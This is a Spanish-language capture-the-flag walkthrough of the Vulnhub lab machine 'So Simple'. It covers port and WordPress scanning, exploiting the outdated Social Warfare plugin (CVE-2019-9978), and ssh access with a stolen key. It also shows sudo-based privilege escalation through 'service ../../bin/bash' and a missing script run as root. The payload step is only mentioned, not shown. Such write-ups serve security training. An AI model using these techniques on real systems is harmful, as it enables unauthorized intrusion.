Hoy vamos a hackear la maquina de Vulnhub llamada
So Simple.Podeis descargarla desde el siguiente enlace:
So Simple
Video
Enumeration
Empezamos con un nmap para ver que puertos
tiene abiertos.
~ > nmap -A -p- 192.168.1.64
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 01:36 CEST
Nmap scan report for so-simple.home (192.168.1.64)
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol
2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.30 seconds
Exploramos mas en detalle el Apache para ver si encontramos alguna
carpeta interesante.
Vemos que aparentemente hay un wordpress instalado.
Usamos wpscan para mirarlo mas en detalle.
~ > wpscan --url http://192.168.1.64/wordpress
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.2
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.1.64/wordpress/ [192.168.1.64]
[+] Started: Mon Jul 27 01:38:56 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.1.64/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce
ss
[+] http://192.168.1.64/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled:
http://192.168.1.64/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled:
http://192.168.1.64/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.1.64/wordpress/index.php/feed/,
https://wordpress.org/?v=5.4.2
| - http://192.168.1.64/wordpress/index.php/comments/feed/,
https://wordpress.org/?v=5.4.2
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/
| Latest Version: 1.6 (up to date)
| Last Updated: 2020-06-10T00:00:00.000Z
| Readme:
http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/readme.txt
| Style URL:
http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the
block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.6 (80% confidence)
| Found By: Style (Passive Detection)
| -
http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
, Match: 'Version: 1.6'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] simple-cart-solution
| Location:
http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/
| Last Updated: 2020-02-21T23:06:00.000Z
| [!] The version is out of date, the latest version is 1.0.0
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 0.2.0 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| -
http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/assets/dis
t/js/public.js?ver=0.2.0
| Confirmed By:
| Readme - Stable Tag (Aggressive Detection)
| -
http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| -
http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
[+] social-warfare
| Location: http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2020-04-14T17:03:00.000Z
| [!] The version is out of date, the latest version is 4.0.1
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.0 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.1.64/wordpress/, Match: 'Social Warfare v3.5.0'
| Confirmed By:
| Query Parameter (Passive Detection)
| -
http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/assets/css/style
.min.css?ver=3.5.0
| -
http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/assets/js/script
.min.js?ver=3.5.0
| Readme - Stable Tag (Aggressive Detection)
| -
http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| -
http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00
<===============================================================================
================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPVulnDB API Token given, as a result vulnerability data has not been
output.
[!] You can get a free API token with 50 daily requests by registering at
https://wpvulndb.com/users/sign_up
[+] Finished: Mon Jul 27 01:39:03 2020
[+] Requests Done: 54
[+] Cached Requests: 5
[+] Data Sent: 13.004 KB
[+] Data Received: 546.451 KB
[+] Memory used: 202.164 MB
[+] Elapsed time: 00:00:06
Exploitation
Encontramos el plugin social warfare, el cual esta
desactualizado.
Buscamos si tiene alguna vulnerabilidad y encontramos lo siguiente[1].
En /var/www/html creamos shell.txt:
Utilizamos la key para conectarnos como max por ssh.
~ > ssh max@192.168.1.64 -i key
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Jul 27 20:01:31 UTC 2020
System load: 0.09
Usage of /: 56.6% of 8.79GB
Memory usage: 31%
Swap usage: 0%
Processes: 136
Users logged in: 0
IPv4 address for docker0: 172.17.0.1
IPv4 address for enp0s3: 192.168.1.64
IPv6 address for enp0s3: 2a01:c50e:21e3:0:a00:27ff:fed8:65bd
* "If you've been waiting for the perfect Kubernetes dev solution for
macOS, the wait is over. Learn how to install Microk8s on macOS."
https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/
47 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Jul 15 19:18:39 2020 from 192.168.1.7
max@so-simple:~$
max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin
User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service
Vemos que podemos ejecutar service como "steven",
Lo usamos para obtener los privilegios de steven.
max@so-simple:~$ sudo -u steven service ../../bin/bash
steven@so-simple:/$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
user2.txt
steven@so-simple:/tmp$ cd ~
steven@so-simple:/home/steven$ ls
user2.txt
steven@so-simple:/home/steven$ cat user2.txt
b662b31b7d8cb9f5cdc9c2010337f9b8
Miramos si podemos hacer algo con sudo.
steven@so-simple:/$ sudo -l
Matching Defaults entries for steven on so-simple:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin
User steven may run the following commands on so-simple:
(root) NOPASSWD: /opt/tools/server-health.sh
Privilege Escalation
Vemos que podemos ejecutar un script .sh el cual no existe.
Procedemos a crear las carpetas necesarias y el script, el
cual contendra "/bin/bash".
Por ultimo le daremos permisos de ejecucion y lo ejecutaremos
con sudo para obtener los privilegios de root.
Y con esto ya seriamos root de la maquina
[1] https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-wordpress-social-warfare-plugin-cve-2019-9978/